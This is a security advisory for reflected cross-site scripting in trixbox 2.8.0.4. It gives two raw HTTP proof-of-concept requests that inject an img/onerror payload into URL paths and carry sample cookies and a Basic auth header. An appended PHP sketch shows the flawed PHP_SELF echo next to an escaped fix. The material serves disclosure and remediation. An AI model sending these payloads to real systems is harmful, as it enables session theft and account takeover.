TrixBox Multiple Cross Site Scripting Vulnerabilities
Vulnerability Title: TrixBox Multiple Cross Site Scripting Vulnerabilities
Affected Product: trixbox-2.8.0.4
Product Page: https://sourceforge.net/projects/asteriskathome/
CVSSv2 Base Score: (AV:N/AC:M/Au:S/C:P/I:P/A:N)
Severity: Medium
Solution Status: N/A
Credit: Sachin Wagh (@tiger_tigerboy)
Description:
XSS vulnerabilities occur when an application includes attacker-controllable data in a response sent to the browser without properly validating or escaping the content.
Impact:
An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Proof-of-Concept:
GET /maint/index.php/59b8b"><img%20src%3da%20onerror%3dalert(1)>4a1b2?packages HTTP/1.1
Host: 192.168.0.6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.6/maint/index.php?configEdit
Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2
Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=
Connection: keep-alive
Upgrade-Insecure-Requests: 1

GET /user/includes/language/langChooser.php/93797"><img%20src%3da%20onerror%3dalert(1)>cb889 HTTP/1.1
Host: 192.168.0.6
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.0.6/user/includes/language/
Cookie: security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2; lng=en; template=classic
Please fix it asap.
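
Added example (not trixbox source and not part of the original advisory): a minimal PHP sketch of the reflection pattern the requests above point to, next to a hardened form. It assumes the page echoes the request path (PHP_SELF, including the extra path segment) into a quoted HTML attribute, as the `">` prefix in the PoC suggests; the function names and the `$server` array are hypothetical.

```php
<?php
declare(strict_types=1);

// Constructed request state (assumption): what PHP would expose for the
// first PoC request, with the extra path segment URL-decoded.
$server = [
    'SCRIPT_NAME' => '/maint/index.php',
    'PATH_INFO'   => '/59b8b"><img src=a onerror=alert(1)>4a1b2',
    'PHP_SELF'    => '/maint/index.php/59b8b"><img src=a onerror=alert(1)>4a1b2',
];

/** Escape a value for use in HTML text or a quoted attribute. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Vulnerable pattern: the request path is echoed raw into an attribute. */
function renderFormVulnerable(array $server): string
{
    return '<form method="post" action="' . $server['PHP_SELF'] . '">';
}

/** Hardened: ignore the client-supplied path segment and escape on output. */
function renderFormHardened(array $server): string
{
    return '<form method="post" action="' . h($server['SCRIPT_NAME']) . '">';
}

/** Optional guard for scripts that never use extra path segments. */
function hasUnexpectedPathInfo(array $server): bool
{
    return ($server['PATH_INFO'] ?? '') !== '';
}

// The vulnerable output closes the attribute and tag early; the hardened
// output contains only the script's own path.
echo 'vulnerable: ', renderFormVulnerable($server), PHP_EOL;
echo 'hardened:   ', renderFormHardened($server), PHP_EOL;
// If the full path must be displayed, escaping keeps it inert text.
echo 'escaped:    ', h($server['PHP_SELF']), PHP_EOL;
echo 'decision:   ', hasUnexpectedPathInfo($server) ? 'reject (404)' : 'serve', PHP_EOL;
```

Where the front end is Apache httpd, `AcceptPathInfo Off` for scripts that do not use trailing path segments gives the same rejection at the server level.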